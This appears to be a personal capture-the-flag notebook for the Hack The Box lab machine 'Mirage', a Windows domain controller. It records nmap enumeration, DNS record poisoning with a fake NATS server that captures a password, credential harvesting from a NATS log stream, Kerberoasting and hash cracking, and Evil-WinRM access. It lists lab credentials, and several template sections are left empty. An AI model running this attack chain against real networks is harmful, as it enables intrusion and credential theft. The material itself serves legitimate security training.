NOTES

ENUMERATION

### NMAP


```shell
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2025-09-15T21:29:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```


### NFS


```shell
╰─❯ showmount -e $IP 
Export list for 10.10.11.78:
/MirageReports (everyone)
```


Found PDFs


![SCR-20250915-oqhv.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/22415446-78ad-4fa0-9c43-d98d623d66ba/SCR-20250915-oqhv.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466STF6QPWV%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082752Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDcPjtsD5zW2Bi2rbz9d%2Fm7uT%2Be6krLV1wyOOqtJTlD0gIgTQ%2BzF78ehRX3AEBs2DEnwhC7VQ9iMj4%2BGO%2Fi640y%2FcMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDH86JFKqS%2FcoDOhrcSrcA7g25pPPTHvQGXc5rXavjwrI2Wz46dN%2F1dv%2FF2cwbCg88TpMkVRcoqTt%2F%2FjX2aYmemPjaWq0mC1nHgU9%2BYu3nLayjvPuXZmVLR3fmz2LMziF1iHQ9T7AQRku0QjGGRC%2Fx52Ufnf%2Ft6Qxi3u0tACtZ0owFe%2Bx1GDXG78IGOh00e1iFQzuulShMU2iJkqf6DDVHYY20Pb713pYLPUFWgmIshKvvvLc1CSYZOYN69zU%2Fym2vLuKb%2Bu5HGjcw4OnfbpW%2BBEEOgZ5r82sWeNRPt%2BwbbuuW%2BLW0HcgvUCK7pFSGkbzYg3l%2BFgtOHZH4ZjaXzWo5NFnW1uLlIqP6C%2FhSkKYHGWYThkJpUhlYUDa8Nn3Q%2BPgxey4br8UCP7Eti%2FccWrbmLex9CYg%2FqBE72EW1qrwPJiF3yjkxKqdubkNvBurNQQ%2Fp8cfsO2xRGEEXOkh7VS4p3AvEihUHSrC3omZeJyNoJqUsxj1zr8NMJC7o%2B0UJxXErgpfQEAxi6OsCGwKSUyrAqhqrlEaCVNFq7tVIBLzvqs9dWSQ6d%2F6etJDezNhcGsswvXBKwqpau%2F7tOXpRkpnKXSGOQoT1CFu1lQ4wITxPe%2FMLbPr3KZv0ZTnxWXGpMXVAvT9NejQGnXHBcsAMPTzuc0GOqUBRo85QwX6APfiV0FL5SBcUnlfhAh1T2er0dvhnckm1Pqtkl%2FlT3y%2FJr6qsUxig7U4YL3BM%2FQQ3UobTBe6rHeb9XsDkHBs6DYiT97r%2BXb0aJ6Dgl90SMLy4YCW52oL3rXzg3YqPrwRZdsx3mL7wlF6GzvfqUnYhwNrUfFYKbwQIRQkQFYz3Tj1OWV5WSxwl8ixWhxJMmHQGhG5gtFk7z4fK%2BcGITjI&X-Amz-Signature=9da85ceaa09c301d93cdc27505d71cea1c2fcaeb0fe6d49a40f0fcf41707c3e7&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


### KERBEROS CONFIG (add) `/etc/krb5.conf`


```shell
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.MIRAGE.HTB
        admin_server = dc01.MIRAGE.HTB
        default_domain = MIRAGE.HTB
    }

[domain_realm]
    .MIRAGE.HTB = MIRAGE.HTB
    MIRAGE.HTB = MIRAGE.HT
```


### DNS Poisoning & Fake NATS Service


Our fake server 


```python
import socket


print("[+] Fake NATS Server listening on 0.0.0.0:4444")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)


while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")


    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode())


    client.close()
```


Update DNS @ domain


```shell
╰─❯ nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 60 A 10.10.14.14
> send
```


Run fake server


```shell
╰─❯ py fakeserver.py
[+] Fake NATS Server listening on 10.10.14.14:4222
[+] Connection from ('10.10.11.78', 54374)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
PING
```

- `Dev_Account_A:hx5h7F5554fP@1337!`

### NATS INTERACT


```shell
╰─❯ nats context add dev-nats --server nats://dc01.mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!' --description "Dev access"
NATS Configuration Context "dev-nats"

  Description: Dev access
  Server URLs: nats://dc01.mirage.htb:4222
     Username: Dev_Account_A
     Password: ******************
         Path: /root/.config/nats/context/dev-nats.json
```


Subscribing NATS


```shell
╰─❯ nats --context dev-nats sub ">" --count 10  
17:25:04 Subscribing on > 
[#1] Received on "$JS.API.STREAM.INFO.auth_logs" with reply "_INBOX.PkApa0tTb8n38FYsClRe8l.sNSetcP3"
nil body


[#2] Received on "_INBOX.PkApa0tTb8n38FYsClRe8l.sNSetcP3"
{"type":"io.nats.jetstream.api.v1.stream_info_response","total":0,"offset":0,"limit":0,"config":{"name":"auth_logs","subjects":["logs.auth"],"retention":"limits","max_consumers":-1,"max_msgs":100,"max_bytes":1048576,"max_age":0,"max_msgs_per_subject":-1,"max_msg_size":-1,"discard":"new","storage":"file","num_replicas":1,"duplicate_window":120000000000,"compression":"none","allow_direct":true,"mirror_direct":false,"sealed":false,"deny_delete":true,"deny_purge":true,"allow_rollup_hdrs":false,"consumer_limits":{},"allow_msg_ttl":false,"metadata":{"_nats.level":"1","_nats.req.level":"0","_nats.ver":"2.11.3"}},"created":"2025-05-05T07:18:19.6244845Z","state":{"messages":5,"bytes":570,"first_seq":1,"first_ts":"2025-05-05T07:18:56.6788658Z","last_seq":5,"last_ts":"2025-05-05T07:19:27.2106658Z","num_subjects":1,"consumer_count":0},"cluster":{"leader":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC"},"ts":"2025-09-15T22:26:01.463391Z"}


[#3] Received on "$JS.EVENT.ADVISORY.API"
{"type":"io.nats.jetstream.advisory.v1.api_audit","id":"61g9tK2zjNEwHlBZMxdSbx","timestamp":"2025-09-15T22:26:01.463391Z","server":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC","client":{"start":"2025-09-15T15:26:01.4594175-07:00","host":"dead:beef::22d","id":137,"acc":"dev","user":"Dev_Account_A","name":"NATS CLI Version 0.2.2","lang":"go","ver":"1.41.1","rtt":2211400,"server":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC","kind":"Client","client_type":"nats"},"subject":"$JS.API.STREAM.INFO.auth_logs","response":"{\"type\":\"io.nats.jetstream.api.v1.stream_info_response\",\"total\":0,\"offset\":0,\"limit\":0,\"config\":{\"name\":\"auth_logs\",\"subjects\":[\"logs.auth\"],\"retention\":\"limits\",\"max_consumers\":-1,\"max_msgs\":100,\"max_bytes\":1048576,\"max_age\":0,\"max_msgs_per_subject\":-1,\"max_msg_size\":-1,\"discard\":\"new\",\"storage\":\"file\",\"num_replicas\":1,\"duplicate_window\":120000000000,\"compression\":\"none\",\"allow_direct\":true,\"mirror_direct\":false,\"sealed\":false,\"deny_delete\":true,\"deny_purge\":true,\"allow_rollup_hdrs\":false,\"consumer_limits\":{},\"allow_msg_ttl\":false,\"metadata\":{\"_nats.level\":\"1\",\"_nats.req.level\":\"0\",\"_nats.ver\":\"2.11.3\"}},\"created\":\"2025-05-05T07:18:19.6244845Z\",\"state\":{\"messages\":5,\"bytes\":570,\"first_seq\":1,\"first_ts\":\"2025-05-05T07:18:56.6788658Z\",\"last_seq\":5,\"last_ts\":\"2025-05-05T07:19:27.2106658Z\",\"num_subjects\":1,\"consumer_count\":0},\"cluster\":{\"leader\":\"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC\"},\"ts\":\"2025-09-15T22:26:01.463391Z\"}"}
```


### Extract Data from NATS


```shell
╰─❯ nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
[dev-nats] ? Start policy (all, new, last, subject, 1h, msg sequence) all
[dev-nats] ? Replay policy instant
[dev-nats] ? Filter Stream by subjects (blank for all) logs.auth
[dev-nats] ? Maximum Allowed Deliveries -1
[dev-nats] ? Maximum Acknowledgments Pending 0
[dev-nats] ? Deliver headers only without bodies No
[dev-nats] ? Add a Retry Backoff Policy No
```


```shell
╰─❯ nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[17:35:36] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
```

- `david.jjackson:pN8kQmn6b86!1234@`

### AUTH


```shell
╰─❯ nxc ldap $IP -u $USER -p $PASS -k
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
```


### FETCHING BLOODHOUND DATA


![SCR-20250915-ppzn.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/6be4dd2b-06ae-4366-bb66-74a590d5d8a6/SCR-20250915-ppzn.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466STF6QPWV%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082752Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDcPjtsD5zW2Bi2rbz9d%2Fm7uT%2Be6krLV1wyOOqtJTlD0gIgTQ%2BzF78ehRX3AEBs2DEnwhC7VQ9iMj4%2BGO%2Fi640y%2FcMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDH86JFKqS%2FcoDOhrcSrcA7g25pPPTHvQGXc5rXavjwrI2Wz46dN%2F1dv%2FF2cwbCg88TpMkVRcoqTt%2F%2FjX2aYmemPjaWq0mC1nHgU9%2BYu3nLayjvPuXZmVLR3fmz2LMziF1iHQ9T7AQRku0QjGGRC%2Fx52Ufnf%2Ft6Qxi3u0tACtZ0owFe%2Bx1GDXG78IGOh00e1iFQzuulShMU2iJkqf6DDVHYY20Pb713pYLPUFWgmIshKvvvLc1CSYZOYN69zU%2Fym2vLuKb%2Bu5HGjcw4OnfbpW%2BBEEOgZ5r82sWeNRPt%2BwbbuuW%2BLW0HcgvUCK7pFSGkbzYg3l%2BFgtOHZH4ZjaXzWo5NFnW1uLlIqP6C%2FhSkKYHGWYThkJpUhlYUDa8Nn3Q%2BPgxey4br8UCP7Eti%2FccWrbmLex9CYg%2FqBE72EW1qrwPJiF3yjkxKqdubkNvBurNQQ%2Fp8cfsO2xRGEEXOkh7VS4p3AvEihUHSrC3omZeJyNoJqUsxj1zr8NMJC7o%2B0UJxXErgpfQEAxi6OsCGwKSUyrAqhqrlEaCVNFq7tVIBLzvqs9dWSQ6d%2F6etJDezNhcGsswvXBKwqpau%2F7tOXpRkpnKXSGOQoT1CFu1lQ4wITxPe%2FMLbPr3KZv0ZTnxWXGpMXVAvT9NejQGnXHBcsAMPTzuc0GOqUBRo85QwX6APfiV0FL5SBcUnlfhAh1T2er0dvhnckm1Pqtkl%2FlT3y%2FJr6qsUxig7U4YL3BM%2FQQ3UobTBe6rHeb9XsDkHBs6DYiT97r%2BXb0aJ6Dgl90SMLy4YCW52oL3rXzg3YqPrwRZdsx3mL7wlF6GzvfqUnYhwNrUfFYKbwQIRQkQFYz3Tj1OWV5WSxwl8ixWhxJMmHQGhG5gtFk7z4fK%2BcGITjI&X-Amz-Signature=fc6228d8d8c5036163b1ee421d5b1f725a53c536b53a2d4939134fa01187e6f3&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


### KERBEROAST


```shell
╰─❯ GetUserSPNs.py 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName      Name          MemberOf                                                             PasswordLastSet             LastLogon                   Delegation 
------------------------  ------------  -------------------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/exchange.mirage.htb  nathan.aadam  CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb  2025-06-23 23:18:18.584667  2025-07-04 22:01:43.511763             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$5a1b53f2802e760a4bfda2fcd33e661e$5aeb9c1fb61cabe05af66284972ccad73e7a232b24e007dc8e282226ccc923081a44a80ee940c7c862f9ba2f4cf35b6a03d8d5bb358b53a72db21c4ce61b7b1a4f5a8798e2f0af9c191619ab623ebaac9772b41089c29d4ae1dbddc05f721cbec0a2f53979453b699c940aeaabca1cae3b433b49d36b65e10532f4388cbe3a036fda4d7a0a9fca990440dae62e2de2ae118b5a4f84b15c4d7361b1f2d5f00f0167e728021fa5a720a0d2091e888a7af923782c1fa8612bbe7c0d5b3b28f52e660335e16813baab1b368ac98fed2975d58ea88930996e0aed4f797986aa479afb89668031e7b0752de12fb5db2e111f5b85e08972ad682260a1ca315d177b58e43435c265d362f5088c1b95519dd8b6168a62daa60303cc2c0752e3acdf41c3b4bc4649fe7cb9932cbbb8551c1ac3a61d7adc14b0bc86b324b669681cba908123609cd2e4ffc557e9b5b5067703fff79f93ef9e5820512ee6bf080273ad42c325b0e56f73e108565dfbea0dbc5db5ed6c9e5333d94be3b37f901df780bbd7f296d4a8c558205b96d089a86549d66dee2305a557a13de40ef33a564074403a4cdbbd6b2f58e8df0e74037db54c4387b0b0e28f15b1a96fc6706d63c8e8c266c54113cfd031cdc03800b5d4fa67df1523b57710ba00e23e19a4fea594e78d1396ed4671117fdbf9ef881e53555cab9ab0a3c16542163fab6889925688eb4eec1033489a4e7dc08eb4c1ac17c61060bcd97d69057770d7c78df7bfad370e25a122bbba770149d5bfa34dfb5d3628bf2000c66bb7b7ca293c1b56b98c44c72519873fc524c587611a6e178de62a4a52f4a949efd08faee037a325a30d4bf1485a65bb141da35c45d6250bff1cb82dd26edf068aeff037f861ad1c190a138f4c7c3f64468239acfec81a403bc0eb453cb5afb366f3fa970a82c154fd0e452a6f6be8af5b7b7e3309f0610cf434d34a0f7a78bf1283b7756ea6f4d2a5f15b204fe81865e7f355420f03d7f9c88f6a6e2a881900d3cd6d861b5156da831dc4a8ab34ca28c8a32992c6e3cb2e92732cd4243ae3f84849d908b8f7239080cf5f668d6452c6245358cde7eb741df5290528801b08f29b47a8c35c281e195b5f6ae61582af54e79214dee8e4580e1d9863396e6ddae27dab16bed4bb9a00b84c88d965dd355132fb76710929fadfba8beba3e259431472ce5570b5680e5c4ad8763c7faaba4725732b8b4fe46416d2373ce024c75f4e9b3984f9aa667a84ad630f60fd8f9877b5781a8bf97ed811baff93bdf6a36a06b351b63347447b639961af246b7801bd04126ca060ee58e2eb39588e4f16fec28128527abf1027a7969ae0f5072a29b455a9a0bff14ac7f68f0f4a9243678a34b348dec363a011da0ddd7c2a93b8515b459317841d39751620b101977b3ce0d82d36f01411159c23ed1ae89c5bb3d067fde0bd3031ffff273eecc85185e9e5680b46c4839ec2b0596b9595f38252ea9520a98180e4b8bbb18083a29fdb2f3f56201386bf1ce0d21f5c6d4e6a37f67c03dd6e285c708010c3ba762e0482ab45e38839508a94030a8de7
```


### Cracked with Hashcat


```shell
╰─❯ hashcat -m 13100 nathan.aadam.krbtgs.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$5a1b53f2802e760a4bfda2fcd33e661e$5aeb9c1fb61cabe05af66284972ccad73e7a232b24e007dc8e282226ccc923081a44a80ee940c7c862f9ba2f4cf35b6a03d8d5bb358b53a72db21c4ce61b7b1a4f5a8798e2f0af9c191619ab623ebaac9772b41089c29d4ae1dbddc05f721cbec0a2f53979453b699c940aeaabca1cae3b433b49d36b65e10532f4388cbe3a036fda4d7a0a9fca990440dae62e2de2ae118b5a4f84b15c4d7361b1f2d5f00f0167e728021fa5a720a0d2091e888a7af923782c1fa8612bbe7c0d5b3b28f52e660335e16813baab1b368ac98fed2975d58ea88930996e0aed4f797986aa479afb89668031e7b0752de12fb5db2e111f5b85e08972ad682260a1ca315d177b58e43435c265d362f5088c1b95519dd8b6168a62daa60303cc2c0752e3acdf41c3b4bc4649fe7cb9932cbbb8551c1ac3a61d7adc14b0bc86b324b669681cba908123609cd2e4ffc557e9b5b5067703fff79f93ef9e5820512ee6bf080273ad42c325b0e56f73e108565dfbea0dbc5db5ed6c9e5333d94be3b37f901df780bbd7f296d4a8c558205b96d089a86549d66dee2305a557a13de40ef33a564074403a4cdbbd6b2f58e8df0e74037db54c4387b0b0e28f15b1a96fc6706d63c8e8c266c54113cfd031cdc03800b5d4fa67df1523b57710ba00e23e19a4fea594e78d1396ed4671117fdbf9ef881e53555cab9ab0a3c16542163fab6889925688eb4eec1033489a4e7dc08eb4c1ac17c61060bcd97d69057770d7c78df7bfad370e25a122bbba770149d5bfa34dfb5d3628bf2000c66bb7b7ca293c1b56b98c44c72519873fc524c587611a6e178de62a4a52f4a949efd08faee037a325a30d4bf1485a65bb141da35c45d6250bff1cb82dd26edf068aeff037f861ad1c190a138f4c7c3f64468239acfec81a403bc0eb453cb5afb366f3fa970a82c154fd0e452a6f6be8af5b7b7e3309f0610cf434d34a0f7a78bf1283b7756ea6f4d2a5f15b204fe81865e7f355420f03d7f9c88f6a6e2a881900d3cd6d861b5156da831dc4a8ab34ca28c8a32992c6e3cb2e92732cd4243ae3f84849d908b8f7239080cf5f668d6452c6245358cde7eb741df5290528801b08f29b47a8c35c281e195b5f6ae61582af54e79214dee8e4580e1d9863396e6ddae27dab16bed4bb9a00b84c88d965dd355132fb76710929fadfba8beba3e259431472ce5570b5680e5c4ad8763c7faaba4725732b8b4fe46416d2373ce024c75f4e9b3984f9aa667a84ad630f60fd8f9877b5781a8bf97ed811baff93bdf6a36a06b351b63347447b639961af246b7801bd04126ca060ee58e2eb39588e4f16fec28128527abf1027a7969ae0f5072a29b455a9a0bff14ac7f68f0f4a9243678a34b348dec363a011da0ddd7c2a93b8515b459317841d39751620b101977b3ce0d82d36f01411159c23ed1ae89c5bb3d067fde0bd3031ffff273eecc85185e9e5680b46c4839ec2b0596b9595f38252ea9520a98180e4b8bbb18083a29fdb2f3f56201386bf1ce0d21f5c6d4e6a37f67c03dd6e285c708010c3ba762e0482ab45e38839508a94030a8de7:3edc#EDC3
                                                          
Session..........: hashcat
Status...........: Cracked

# 3edc#EDC3
```

- `nathan.aadam:3edc#EDC3`

### Grab TGT


```shell
╰─❯ getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3'
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in nathan.aadam.ccache
```


### Export ticket


```shell
╰─❯ export KRB5CCNAME=nathan.aadam.ccache
```


### Access with Evil-WinRM


```shell
╰─❯ evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
```

FOOTHOLD

### Access with Evil-WinRM


```shell
╰─❯ evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
```

PRIVILEGE ESCALATION

### Winlogon creds


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/4c855e30-697f-424a-a506-708b6e1a062b/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XE2BSQP5%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082753Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJIMEYCIQDzb1Wq8PDTxvUHg25j770IrpXdAFU79UDPFPdHfCnRsQIhANUWxmru8Abk%2F3MwOxfybxi0jaGmuLyYnDuVqHWDr1iyKv8DCCkQABoMNjM3NDIzMTgzODA1IgypiujDTpTEHwdsOOUq3APetpZpgXqX9ToRAelxauQJFrNGHl8BXhjELEuMMoZZsqENSD4CLz1Dq13nVRYoomjDao3%2FqX7kdIyqdbJp6%2FRX6i0q%2FkmZFNg2XQPKsHfxLMiOsiAysKJnqq0xLmpIDfZa%2FRdZh2FRQEykEuB9X8kiL8HavS0cC1AFLjWe9wWl%2Bk8XGu3FOMUFdzSG2xyhAklXlO0546Rx%2BJYazRp1dKM%2BtZUZTjm0lEQGqfYZ1mdetnCcMEn%2B6SbOcetgdg62Pa9WB3ZKKic8y22866J1Xq8FRAgsYhVrOgYnM0mMXj9JMqmO88CrlU6IzKqJrCSyWCzF3vYfVk46MZlJzY1cgsAl0LDPBpLNu%2FeGN0rSbeWgJZXDc0wtz%2B%2FHZxroLYOdLq%2FRHO%2BoYDrlrHlwIsI7aK%2B%2FWLlAthXv0NDiC%2F7DbslgfBtIuH4vpRVBjLVfHYsiJCrojA68Ysmy5r%2BqfecrEwJrj7575UWnunZ2Gx1fbYDpA0xc53vrE7Y%2FMkgYzzyIs0wRJNZj%2FTBHJZWLYTgLTN6NDpXJ22F8KUXG%2FV%2FNr7dO3TbEjrq278FqFya0oZVm%2F5FFhZ8ykFf7iSGBMeEaZw16oSvdAGPCvimgHkTvOzdTU3Rlk0Q8UHQWKCLvuzDt87nNBjqkAcTH2ibwtoNGPl%2FVzPVgXK4D0k31U1EsG%2B19N6pr8zgHgSQMCHqe7ZnxMncZWF%2BsWAauby8Ckjy7ApW5Tm6eNhvEesS5UoSdrk8TAN5UzoBpochRtdtfqxan3MhkE9wrfTx73kExYb2shqg%2BGWkzhmSye25SXnYna4OUbg0jtHhgYwgSzphInEJaJSrw%2Bgfs%2B%2FX%2BCFjjAs6TyC6CSj%2BeXFBuFtFj&X-Amz-Signature=e70030813ed9487bf2f7c161a2ea1392ca3bf0f866ace633381f09dbf891f516&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

- `mark.bbond:1day@atime`

### Further enumeration


This user has password change rights on javier.mmarshall

SYSTEM OWNAGE

CLEANUP

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

### FILES


### DIRS


### SUBDIRS


### VHOSTS

SCOPE

IP	HOSTNAME	DOMAIN NAME	OS
10.10.11.78	dc01	mirage.htb

Mirage

NOTES

ENUMERATION

FOOTHOLD

PRIVILEGE ESCALATION

SYSTEM OWNAGE

CLEANUP

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

SCOPE

USERS

CREDENTIALS

NMAP

SMB SHARES

OTHER NOTES

LOGS

ⓒ 0xNRG